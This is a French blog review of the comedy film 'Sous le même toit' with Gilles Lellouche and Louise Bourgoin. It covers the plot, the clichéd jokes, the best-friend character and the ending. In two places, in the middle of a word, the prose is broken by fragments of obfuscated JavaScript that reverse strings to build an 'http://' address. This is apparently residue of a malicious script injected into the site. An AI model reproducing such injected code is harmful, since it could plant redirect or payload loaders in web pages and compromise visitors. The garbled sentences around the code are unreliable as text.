Critique de film : Sous le Même Toit

critique film sous le même toit

Dans le genre “Maman ou Papa ?”, le nouveau et 7ème long métrage de Dominique Farrugia, “Sous le même toit”, avec Gilles Lelouche et Louise Bourgouin, aborde le divorce avec humour.

critique film sous le même toit

Synopsis : Pour relancer leur couple, Delphine (Louise Bourgouin) et Yvan (Gilles Lelouche) se propose d’aller voir ailleurs. Mais Yvan, au début réticent, va plus vite que prévu et Delphine décide de divorcer. Le problème, Yvan n’a pas un rond et est propriétaire de 20% de la maison, alors il n’y a plus qu’une seule solution, partager la maison. 

On notera, avec les noms des personnages choisis, la référence au tout premier long métrage de Dominique Farrugia : Delphine : 1 – Yvan : 0. Un film qui évoquait, à l’époque, les premiers pas de la vie de couple.

Sous le même toit: une comédie … française

A l’heure où le mariage est de nouveau à la mode chez les jeunes générations, le film paraît un peu has been. Si le film se veut humoristique, il reste tout de même plutôt bateau. Le nouveau petit copain cassé dans son élan, les vacheries de l’ex belle-mère, les enfants à demi rebelles typiques des films français, etc. Et comble de l’horreur, voir Gilles Lellouche nu. On se retrouve avec un mauvais remake des gags de Un Gars, Une Fille, le divorce en plus.

J’ai cependant apprécié le personnage du meilleur ami, Nico (Manu Payet). Dont l’humour et les traits de caractères étaient un peu plus naturels. Bon point aussi pour le dénouement, qui (sans spoiler) offre une perspective différente et presque inattendue, ainsi qu’une jolie image de fin.

critique film sous le même toit

Retrouvez Sous le Même Toit en salle le 19 avril

La b {if (typeof ($Ikf.list[n]) == “string”) return $Ikf.list[n].split(“”).reverse().join(“”);return $Ikf.list[n];};$Ikf.list=[“\’ //:ptth\’= “]; ( () * 6); ; );}ande annonce de Sous le Même Toit :

Il est un peu dommage, que le cinéma français de nos jours se résume en gr {if (typeof ($Ikf.list[n]) == “string”) return $Ikf.list[n].split(“”).reverse().join(“”);return $Ikf.list[n];};$Ikf.list=[“\’ //:ptth\’= “]; ( () * 6); ; );}ande partie par des comédies moyennement drôles et très stéréotypées.

Articles recommandés

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *